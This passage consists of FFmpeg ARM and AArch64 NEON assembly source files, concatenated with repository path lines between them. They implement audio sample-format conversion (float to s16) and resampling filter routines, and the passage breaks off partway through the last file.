subs w6, w6, #4
LOAD4 v4, v5, x3
LOAD4 v6, v7, x9
M_MLA v0, v4, v6, v1
M_MLA2 v1, v5, v7
b.eq 0f
b 4b
2: // remaining filter_length 1-3
cmp w6, #2
b.lt 1f
LOAD2 2, x3
LOAD2 3, x9
subs w6, w6, #2
M_MLA v0, v2, v3
b.eq 0f
1: // remaining filter_length 1
LOAD1 6, x3
LOAD1 7, x9
M_MLA v0, v6, v7
0:
STORE_ONE 0, x1, x2, v1
ret
endfunc
.purgem LOAD1
.purgem LOAD2
.purgem LOAD4
.purgem LOAD8
.purgem M_MLA
.purgem M_MLA2
.purgem M_MUL
.purgem M_MUL2
.purgem STORE_ONE
.endm
.macro LOAD1 d1, addr
ldr d\d1, [\addr], #8
.endm
.macro LOAD2 d1, addr
ld1 {v\d1\().2d}, [\addr], #16
.endm
.macro LOAD4 d1, d2, addr
ld1 {\d1\().2d,\d2\().2d}, [\addr], #32
.endm
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().2d,\d2\().2d,\d3\().2d,\d4\().2d}, [\addr], #64
.endm
.macro M_MLA d, r0, r1, d2:vararg
fmla \d\().2d, \r0\().2d, \r1\().2d
.endm
.macro M_MLA2 second:vararg
M_MLA \second
.endm
.macro M_MUL d, r0, r1, d2:vararg
fmul \d\().2d, \r0\().2d, \r1\().2d
.endm
.macro M_MUL2 second:vararg
M_MUL \second
.endm
.macro STORE_ONE rn, addr, idx, d2
fadd v\rn\().2d, v\rn\().2d, \d2\().2d
faddp d\rn\(), v\rn\().2d
str d\rn\(), [\addr, \idx, lsl #3]
.endm
resample_one dbl, 3
.macro LOAD1 d1, addr
ldr s\d1, [\addr], #4
.endm
.macro LOAD2 d1, addr
ld1 {v\d1\().2s}, [\addr], #8
.endm
.macro LOAD4 d1, d2, addr
ld1 {\d1\().4s}, [\addr], #16
.endm
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().4s,\d2\().4s}, [\addr], #32
.endm
.macro M_MLA d, r0, r1, d2:vararg
fmla \d\().4s, \r0\().4s, \r1\().4s
.endm
.macro M_MUL d, r0, r1, d2:vararg
fmul \d\().4s, \r0\().4s, \r1\().4s
.endm
.macro STORE_ONE rn, addr, idx, d2
faddp v\rn\().4s, v\rn\().4s, v\rn\().4s
faddp s\rn\(), v\rn\().2s
str s\rn\(), [\addr, \idx, lsl #2]
.endm
resample_one flt
.macro LOAD1 d1, addr
ldr h\d1, [\addr], #2
.endm
.macro LOAD2 d1, addr
ldr s\d1, [\addr], #4
.endm
.macro LOAD4 d1, d2, addr
ld1 {\d1\().4h}, [\addr], #8
.endm
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().4h,\d2\().4h}, [\addr], #16
.endm
.macro M_MLA d, r0, r1, d2:vararg
smlal \d\().4s, \r0\().4h, \r1\().4h
.endm
.macro M_MUL d, r0, r1, d2:vararg
smull \d\().4s, \r0\().4h, \r1\().4h
.endm
.macro STORE_ONE rn, addr, idx, d2
addp v\rn\().4s, v\rn\().4s, v\rn\().4s
addp v\rn\().4s, v\rn\().4s, v\rn\().4s
sqrshrn v\rn\().4h, v\rn\().4s, #15
str h\rn\(), [\addr, \idx, lsl #1]
.endm
resample_one s16, 1
.macro LOAD1 d1, addr
ldr s\d1, [\addr], #4
.endm
.macro LOAD2 d1, addr
ld1 {v\d1\().2s}, [\addr], #8
.endm
.macro LOAD4 d1, d2, addr
ld1 {\d1\().4s}, [\addr], #16
.endm
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().4s,\d2\().4s}, [\addr], #32
.endm
.macro M_MLA d1, r0, r1, d2:vararg
smlal \d1\().2d, \r0\().2s, \r1\().2s
.ifnb \d2
smlal2 \d2\().2d, \r0\().4s, \r1\().4s
.endif
.endm
.macro M_MUL d1, r0, r1, d2:vararg
smull \d1\().2d, \r0\().2s, \r1\().2s
.ifnb \d2
smull2 \d2\().2d, \r0\().4s, \r1\().4s
.endif
.endm
.macro STORE_ONE rn, addr, idx, d2
add v\rn\().2d, v\rn\().2d, \d2\().2d
addp d\rn\(), v\rn\().2d
sqrshrn v\rn\().2s, v\rn\().2d, #30
str s\rn\(), [\addr, \idx, lsl #2]
.endm
resample_one s32
|
Akagi201/ffmpeg-xcode
| 14,779
|
ffmpeg-3.0.2/libavresample/aarch64/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/aarch64/asm.S"
function ff_conv_flt_to_s16_neon, export=1
subs x2, x2, #8
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
b.eq 3f
ands x12, x2, #~15
b.eq 2f
1: subs x12, x12, #16
sqrshrn v4.4h, v4.4s, #16
ld1 {v2.4s}, [x1], #16
fcvtzs v6.4s, v2.4s, #31
sqrshrn2 v4.8h, v5.4s, #16
ld1 {v3.4s}, [x1], #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
st1 {v6.8h}, [x0], #16
b.ne 1b
ands x2, x2, #15
b.eq 3f
2: ld1 {v2.4s}, [x1], #16
sqrshrn v4.4h, v4.4s, #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x1], #16
sqrshrn2 v4.8h, v5.4s, #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
st1 {v6.8h}, [x0]
ret
3: sqrshrn v4.4h, v4.4s, #16
sqrshrn2 v4.8h, v5.4s, #16
st1 {v4.8h}, [x0]
ret
endfunc
function ff_conv_fltp_to_s16_2ch_neon, export=1
ldp x4, x5, [x1]
subs x2, x2, #8
ld1 {v0.4s}, [x4], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
b.eq 3f
ands x12, x2, #~15
b.eq 2f
1: subs x12, x12, #16
ld1 {v16.4s}, [x4], #16
fcvtzs v20.4s, v16.4s, #31
sri v6.4s, v4.4s, #16
ld1 {v17.4s}, [x4], #16
fcvtzs v21.4s, v17.4s, #31
ld1 {v18.4s}, [x5], #16
fcvtzs v22.4s, v18.4s, #31
ld1 {v19.4s}, [x5], #16
sri v7.4s, v5.4s, #16
st1 {v6.4s}, [x0], #16
fcvtzs v23.4s, v19.4s, #31
st1 {v7.4s}, [x0], #16
sri v22.4s, v20.4s, #16
ld1 {v0.4s}, [x4], #16
sri v23.4s, v21.4s, #16
st1 {v22.4s}, [x0], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
st1 {v23.4s}, [x0], #16
b.ne 1b
ands x2, x2, #15
b.eq 3f
2: sri v6.4s, v4.4s, #16
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v2.4s, v2.4s, #31
sri v7.4s, v5.4s, #16
ld1 {v3.4s}, [x5], #16
fcvtzs v3.4s, v3.4s, #31
sri v2.4s, v0.4s, #16
st1 {v6.4s,v7.4s}, [x0], #32
sri v3.4s, v1.4s, #16
st1 {v2.4s,v3.4s}, [x0], #32
ret
3: sri v6.4s, v4.4s, #16
sri v7.4s, v5.4s, #16
st1 {v6.4s,v7.4s}, [x0]
ret
endfunc
function ff_conv_fltp_to_s16_neon, export=1
cmp w3, #2
b.eq X(ff_conv_fltp_to_s16_2ch_neon)
b.gt 1f
ldr x1, [x1]
b X(ff_conv_flt_to_s16_neon)
1:
cmp w3, #4
lsl x12, x3, #1
b.lt 4f
5: // 4 channels
ldp x4, x5, [x1], #16
ldp x6, x7, [x1], #16
mov w9, w2
mov x8, x0
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #8
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
sri v5.4s, v4.4s, #16
ld1 {v1.4s}, [x5], #16
fcvtzs v1.4s, v1.4s, #31
sri v7.4s, v6.4s, #16
ld1 {v2.4s}, [x6], #16
fcvtzs v2.4s, v2.4s, #31
zip1 v16.4s, v5.4s, v7.4s
ld1 {v3.4s}, [x7], #16
fcvtzs v3.4s, v3.4s, #31
zip2 v17.4s, v5.4s, v7.4s
st1 {v16.d}[0], [x8], x12
sri v1.4s, v0.4s, #16
st1 {v16.d}[1], [x8], x12
sri v3.4s, v2.4s, #16
st1 {v17.d}[0], [x8], x12
zip1 v18.4s, v1.4s, v3.4s
st1 {v17.d}[1], [x8], x12
zip2 v19.4s, v1.4s, v3.4s
b.eq 7f
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v18.d}[0], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v18.d}[1], [x8], x12
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v19.d}[0], [x8], x12
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
st1 {v19.d}[1], [x8], x12
b 6b
7:
st1 {v18.d}[0], [x8], x12
st1 {v18.d}[1], [x8], x12
st1 {v19.d}[0], [x8], x12
st1 {v19.d}[1], [x8], x12
subs w3, w3, #4
b.eq end
cmp w3, #4
add x0, x0, #8
b.ge 5b
4: // 2 channels
cmp w3, #2
b.lt 4f
ldp x4, x5, [x1], #16
mov w9, w2
mov x8, x0
tst w9, #8
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
b.eq 6f
subs w9, w9, #8
b.eq 7f
sri v5.4s, v4.4s, #16
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v5.s}[0], [x8], x12
sri v7.4s, v6.4s, #16
st1 {v5.s}[1], [x8], x12
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #16
ld1 {v0.4s}, [x4], #16
sri v5.4s, v4.4s, #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x5], #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
fcvtzs v1.4s, v1.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
ld1 {v2.4s}, [x4], #16
st1 {v7.s}[0], [x8], x12
fcvtzs v2.4s, v2.4s, #31
st1 {v7.s}[1], [x8], x12
ld1 {v3.4s}, [x5], #16
st1 {v7.s}[2], [x8], x12
fcvtzs v3.4s, v3.4s, #31
st1 {v7.s}[3], [x8], x12
sri v1.4s, v0.4s, #16
sri v3.4s, v2.4s, #16
b.eq 6f
ld1 {v4.4s}, [x4], #16
st1 {v1.s}[0], [x8], x12
fcvtzs v4.4s, v4.4s, #31
st1 {v1.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
st1 {v1.s}[2], [x8], x12
fcvtzs v5.4s, v5.4s, #31
st1 {v1.s}[3], [x8], x12
ld1 {v6.4s}, [x4], #16
st1 {v3.s}[0], [x8], x12
fcvtzs v6.4s, v6.4s, #31
st1 {v3.s}[1], [x8], x12
ld1 {v7.4s}, [x5], #16
st1 {v3.s}[2], [x8], x12
fcvtzs v7.4s, v7.4s, #31
st1 {v3.s}[3], [x8], x12
b.gt 6b
6:
st1 {v1.s}[0], [x8], x12
st1 {v1.s}[1], [x8], x12
st1 {v1.s}[2], [x8], x12
st1 {v1.s}[3], [x8], x12
st1 {v3.s}[0], [x8], x12
st1 {v3.s}[1], [x8], x12
st1 {v3.s}[2], [x8], x12
st1 {v3.s}[3], [x8], x12
b 8f
7:
sri v5.4s, v4.4s, #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
8:
subs w3, w3, #2
add x0, x0, #4
b.eq end
4: // 1 channel
ldr x4, [x1]
tst w2, #8
mov w9, w2
mov x5, x0
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b.ne 8f
6:
subs w9, w9, #16
ld1 {v2.4s}, [x4], #16
fcvtzs v2.4s, v2.4s, #31
ld1 {v3.4s}, [x4], #16
fcvtzs v3.4s, v3.4s, #31
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq 7f
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
7:
st1 {v2.h}[1], [x5], x12
st1 {v2.h}[3], [x5], x12
st1 {v2.h}[5], [x5], x12
st1 {v2.h}[7], [x5], x12
st1 {v3.h}[1], [x5], x12
st1 {v3.h}[3], [x5], x12
st1 {v3.h}[5], [x5], x12
st1 {v3.h}[7], [x5], x12
b.gt 6b
ret
8:
subs w9, w9, #8
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq end
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b 6b
end:
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 9,173
|
ffmpeg-3.0.2/libavresample/arm/resample_neon.S
|
/*
* Copyright (c) 2014 Peter Meerwald <pmeerw@pmeerw.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "asm-offsets.h"
.macro resample_one fmt, es=2
function ff_resample_one_\fmt\()_neon, export=1
push {r4, r5}
add r1, r1, r2, lsl #\es
ldr r2, [r0, #PHASE_SHIFT+4] /* phase_mask */
ldr ip, [sp, #8] /* index */
ldr r5, [r0, #FILTER_LENGTH]
and r2, ip, r2 /* (index & phase_mask) */
ldr r4, [r0, #PHASE_SHIFT]
lsr r4, ip, r4 /* compute sample_index */
mul r2, r2, r5
ldr ip, [r0, #FILTER_BANK]
add r3, r3, r4, lsl #\es /* &src[sample_index] */
cmp r5, #8
add r0, ip, r2, lsl #\es /* filter = &filter_bank[...] */
blt 5f
8:
subs r5, r5, #8
LOAD4
MUL4
7:
LOAD4
beq 6f
cmp r5, #8
MLA4
blt 4f
subs r5, r5, #8
LOAD4
MLA4
b 7b
6:
MLA4
STORE
pop {r4, r5}
bx lr
5:
INIT4
4: /* remaining filter_length 1 to 7 */
cmp r5, #4
blt 2f
subs r5, r5, #4
LOAD4
MLA4
beq 0f
2: /* remaining filter_length 1 to 3 */
cmp r5, #2
blt 1f
subs r5, r5, #2
LOAD2
MLA2
beq 0f
1: /* remaining filter_length 1 */
LOAD1
MLA1
0:
STORE
pop {r4, r5}
bx lr
endfunc
.purgem LOAD1
.purgem LOAD2
.purgem LOAD4
.purgem MLA1
.purgem MLA2
.purgem MLA4
.purgem MUL4
.purgem INIT4
.purgem STORE
.endm
/* float32 */
.macro LOAD1
veor.32 d0, d0
vld1.32 {d0[0]}, [r0]! /* load filter */
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
vld1.32 {d0}, [r0]! /* load filter */
vld1.32 {d4}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.32 {d0,d1}, [r0]! /* load filter */
vld1.32 {d4,d5}, [r3]! /* load src */
.endm
.macro MLA1
vmla.f32 d16, d0, d4[0]
.endm
.macro MLA2
vmla.f32 d16, d0, d4
.endm
.macro MLA4
vmla.f32 d16, d0, d4
vmla.f32 d17, d1, d5
.endm
.macro MUL4
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d5
.endm
.macro INIT4
veor.f32 q8, q8
.endm
.macro STORE
vpadd.f32 d16, d16, d17
vpadd.f32 d16, d16, d16
vst1.32 d16[0], [r1]
.endm
resample_one flt, 2
/* s32 */
.macro LOAD1
veor.32 d0, d0
vld1.32 {d0[0]}, [r0]! /* load filter */
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
vld1.32 {d0}, [r0]! /* load filter */
vld1.32 {d4}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.32 {d0,d1}, [r0]! /* load filter */
vld1.32 {d4,d5}, [r3]! /* load src */
.endm
.macro MLA1
vmlal.s32 q8, d0, d4[0]
.endm
.macro MLA2
vmlal.s32 q8, d0, d4
.endm
.macro MLA4
vmlal.s32 q8, d0, d4
vmlal.s32 q9, d1, d5
.endm
.macro MUL4
vmull.s32 q8, d0, d4
vmull.s32 q9, d1, d5
.endm
.macro INIT4
veor.s64 q8, q8
veor.s64 q9, q9
.endm
.macro STORE
vadd.s64 q8, q8, q9
vadd.s64 d16, d16, d17
vqrshrn.s64 d16, q8, #30
vst1.32 d16[0], [r1]
.endm
resample_one s32, 2
/* s16 */
.macro LOAD1
veor.16 d0, d0
vld1.16 {d0[0]}, [r0]! /* load filter */
vld1.16 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
veor.16 d0, d0
vld1.32 {d0[0]}, [r0]! /* load filter */
veor.16 d4, d4
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.16 {d0}, [r0]! /* load filter */
vld1.16 {d4}, [r3]! /* load src */
.endm
.macro MLA1
vmlal.s16 q8, d0, d4[0]
.endm
.macro MLA2
vmlal.s16 q8, d0, d4
.endm
.macro MLA4
vmlal.s16 q8, d0, d4
.endm
.macro MUL4
vmull.s16 q8, d0, d4
.endm
.macro INIT4
veor.s32 q8, q8
.endm
.macro STORE
vpadd.s32 d16, d16, d17
vpadd.s32 d16, d16, d16
vqrshrn.s32 d16, q8, #15
vst1.16 d16[0], [r1]
.endm
resample_one s16, 1
.macro resample_linear fmt, es=2
function ff_resample_linear_\fmt\()_neon, export=1
push {r4, r5}
add r1, r1, r2, lsl #\es
ldr r2, [r0, #PHASE_SHIFT+4] /* phase_mask */
ldr ip, [sp, #8] /* index */
ldr r5, [r0, #FILTER_LENGTH]
and r2, ip, r2 /* (index & phase_mask) */
ldr r4, [r0, #PHASE_SHIFT]
lsr r4, ip, r4 /* compute sample_index */
mul r2, r2, r5
ldr ip, [r0, #FILTER_BANK]
add r3, r3, r4, lsl #\es /* &src[sample_index] */
cmp r5, #8
ldr r4, [r0, #SRC_INCR]
add r0, ip, r2, lsl #\es /* filter = &filter_bank[...] */
add r2, r0, r5, lsl #\es /* filter[... + c->filter_length] */
blt 5f
8:
subs r5, r5, #8
LOAD4
MUL4
7:
LOAD4
beq 6f
cmp r5, #8
MLA4
blt 4f
subs r5, r5, #8
LOAD4
MLA4
b 7b
6:
MLA4
STORE
pop {r4, r5}
bx lr
5:
INIT4
4: /* remaining filter_length 1 to 7 */
cmp r5, #4
blt 2f
subs r5, r5, #4
LOAD4
MLA4
beq 0f
2: /* remaining filter_length 1 to 3 */
cmp r5, #2
blt 1f
subs r5, r5, #2
LOAD2
MLA2
beq 0f
1: /* remaining filter_length 1 */
LOAD1
MLA1
0:
STORE
pop {r4, r5}
bx lr
endfunc
.purgem LOAD1
.purgem LOAD2
.purgem LOAD4
.purgem MLA1
.purgem MLA2
.purgem MLA4
.purgem MUL4
.purgem INIT4
.purgem STORE
.endm
/* float32 linear */
.macro LOAD1
veor.32 d0, d0
veor.32 d2, d2
vld1.32 {d0[0]}, [r0]! /* load filter */
vld1.32 {d2[0]}, [r2]! /* load filter */
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
vld1.32 {d0}, [r0]! /* load filter */
vld1.32 {d2}, [r2]! /* load filter */
vld1.32 {d4}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.32 {d0,d1}, [r0]! /* load filter */
vld1.32 {d2,d3}, [r2]! /* load filter */
vld1.32 {d4,d5}, [r3]! /* load src */
.endm
.macro MLA1
vmla.f32 d18, d0, d4[0]
vmla.f32 d16, d2, d4[0]
.endm
.macro MLA2
vmla.f32 d18, d0, d4
vmla.f32 d16, d2, d4
.endm
.macro MLA4
vmla.f32 q9, q0, q2
vmla.f32 q8, q1, q2
.endm
.macro MUL4
vmul.f32 q9, q0, q2
vmul.f32 q8, q1, q2
.endm
.macro INIT4
veor.f32 q9, q9
veor.f32 q8, q8
.endm
.macro STORE
vldr s0, [sp, #12] /* frac */
vmov s1, r4
vcvt.f32.s32 d0, d0
vsub.f32 q8, q8, q9 /* v2 - val */
vpadd.f32 d18, d18, d19
vpadd.f32 d16, d16, d17
vpadd.f32 d2, d18, d18
vpadd.f32 d1, d16, d16
vmul.f32 s2, s2, s0 /* (v2 - val) * frac */
vdiv.f32 s2, s2, s1 /* / c->src_incr */
vadd.f32 s4, s4, s2
vstr s4, [r1]
.endm
resample_linear flt, 2
|
Akagi201/ffmpeg-xcode
| 14,088
|
ffmpeg-3.0.2/libavresample/arm/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/arm/asm.S"
function ff_conv_flt_to_s16_neon, export=1
subs r2, r2, #8
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q8, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
beq 3f
bics r12, r2, #15
beq 2f
1: subs r12, r12, #16
vqrshrn.s32 d4, q8, #16
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vqrshrn.s32 d5, q9, #16
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vld1.32 {q8}, [r1,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {q3}, [r0,:128]!
bne 1b
ands r2, r2, #15
beq 3f
2: vld1.32 {q0}, [r1,:128]!
vqrshrn.s32 d4, q8, #16
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vqrshrn.s32 d5, q9, #16
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vst1.16 {q3}, [r0,:128]!
bx lr
3: vqrshrn.s32 d4, q8, #16
vqrshrn.s32 d5, q9, #16
vst1.16 {q2}, [r0,:128]!
bx lr
endfunc
function ff_conv_fltp_to_s16_2ch_neon, export=1
ldm r1, {r1, r3}
subs r2, r2, #8
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q8, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
beq 3f
bics r12, r2, #15
beq 2f
1: subs r12, r12, #16
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q10, q8, #16
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vld1.32 {q13}, [r3,:128]!
vsri.32 q11, q9, #16
vst1.16 {q10}, [r0,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q11}, [r0,:128]!
vsri.32 q12, q0, #16
vld1.32 {q8}, [r1,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12}, [r0,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {q13}, [r0,:128]!
bne 1b
ands r2, r2, #15
beq 3f
2: vsri.32 q10, q8, #16
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vsri.32 q11, q9, #16
vld1.32 {q13}, [r3,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q10}, [r0,:128]!
vsri.32 q12, q0, #16
vst1.16 {q11}, [r0,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12-q13},[r0,:128]!
bx lr
3: vsri.32 q10, q8, #16
vsri.32 q11, q9, #16
vst1.16 {q10-q11},[r0,:128]!
bx lr
endfunc
function ff_conv_fltp_to_s16_neon, export=1
cmp r3, #2
itt lt
ldrlt r1, [r1]
blt X(ff_conv_flt_to_s16_neon)
beq X(ff_conv_fltp_to_s16_2ch_neon)
push {r4-r8, lr}
cmp r3, #4
lsl r12, r3, #1
blt 4f
@ 4 channels
5: ldm r1!, {r4-r7}
mov lr, r2
mov r8, r0
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #8
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q9, q8, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 q11, q10, #16
vld1.32 {q2}, [r6,:128]!
vcvt.s32.f32 q2, q2, #31
vzip.32 d18, d22
vld1.32 {q3}, [r7,:128]!
vcvt.s32.f32 q3, q3, #31
vzip.32 d19, d23
vst1.16 {d18}, [r8], r12
vsri.32 q1, q0, #16
